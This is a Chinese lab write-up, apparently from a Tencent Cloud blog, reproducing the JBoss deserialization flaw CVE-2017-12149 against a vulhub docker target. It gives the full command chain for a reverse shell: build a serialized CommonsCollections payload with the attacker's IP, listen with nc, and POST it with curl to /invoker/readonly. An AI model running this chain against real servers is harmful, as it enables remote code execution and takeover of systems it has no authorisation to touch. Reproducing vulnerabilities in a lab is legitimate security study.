前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >JBOSS反序列化漏洞复现(CVE-2017-12149)

JBOSS反序列化漏洞复现(CVE-2017-12149)

作者头像
R0A1NG
发布2022-02-19 10:17:16
1.6K0
发布2022-02-19 10:17:16
举报
文章被收录于专栏:R0A1NG 技术分享R0A1NG 技术分享

原理

该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。

影响版本

JBoss AS 5.x和6.x版

漏洞复现

攻击机:xx.xx.xx.xx 靶机:x.x.x.x 1.靶机环境搭建 用docker拉取靶机镜像

docker pull vulhub/jboss:as-4.0.5

创建启动靶机容器

docker run -d -p 9700:8000 vulhub/jboss:as-4.0.5 注:9700为外部映射端口,可自定义 2.漏洞检测利用 反弹shell exp工具下载:https://github.com/joaomatosf/JavaDeserH2HC 编译并生成序列化数据,生成ReverseShellCommonsCollectionsHashMap.class文件 javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java

序列化恶意数据至文件,生成ReverseShellCommonsCollectionsHashMap.ser文件

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap xx.xx.xx.xx:9963 注:xx.xx.xx.xx是攻击者IP,端口为反弹shell端口

攻击机监听9963端口

nc -lvnp 9963

ReverseShellCommonsCollectionsHashMap.ser发送到靶机

curl http://x.x.x.x:9700/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser --data-binary 以二进制的方式post数据

942.jpg
942.jpg

反弹shell成功

4939.jpg
4939.jpg
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2021 年 11 月,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 原理
  • 影响版本
  • 漏洞复现
相关产品与服务
文件存储
文件存储(Cloud File Storage,CFS)为您提供安全可靠、可扩展的共享文件存储服务。文件存储可与腾讯云服务器、容器服务、批量计算等服务搭配使用,为多个计算节点提供容量和性能可弹性扩展的高性能共享存储。腾讯云文件存储的管理界面简单、易使用,可实现对现有应用的无缝集成;按实际用量付费,为您节约成本,简化 IT 运维工作。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档